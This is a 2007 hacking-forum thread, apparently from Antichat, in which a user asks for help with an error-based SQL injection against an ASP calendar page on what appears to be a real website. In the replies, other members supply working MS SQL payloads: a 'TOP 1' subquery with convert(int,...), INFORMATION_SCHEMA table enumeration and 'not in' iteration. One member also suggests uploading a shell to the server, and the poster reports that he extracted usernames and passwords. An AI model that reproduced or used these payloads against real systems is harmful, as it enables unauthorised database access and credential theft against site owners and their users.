ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

help !! sql+asp
  #1  
Старый 16.11.2007, 06:36
Patriot_Sa
Новичок
Регистрация: 02.11.2007
Сообщений: 2
Провел на форуме:
8318

Репутация: 0
Unhappy help !! sql+asp

hey../

Ask our inquiry last sql asp

Show me this talk Look

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.

/AR/Main/Calendar_CheckMonth.asp, line 130


It is user:
convert(int,+(select+UserName+from+Users));--

What can I do?
 
Ответить с цитированием

  #2  
Старый 16.11.2007, 10:37
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

convert(int+(select+UserName+from+pass));--

there are tables (User etc or try namr db UserName etc) what chek
Try to throw Shell on a server, if I have correctly understood you.
 
Ответить с цитированием

  #3  
Старый 16.11.2007, 17:19
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Я по аглицки писать не умею, но попробую

Use "TOP 1" in your Select query
Example:
id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES)

try:
convert(int,+(select+TOP 1+UserName+from+Users));--

Then, using a construction: "where..not in "
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 16.11.2007 в 17:23..
 
Ответить с цитированием

  #4  
Старый 17.11.2007, 01:54
Patriot_Sa
Новичок
Регистрация: 02.11.2007
Сообщений: 2
Провел на форуме:
8318

Репутация: 0
По умолчанию

thanx Sn@k3 ,Scipio

It is user:
convert(int,+(select+TOP 1+UserName+from+Users));--

Noon me user and password ^_^
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ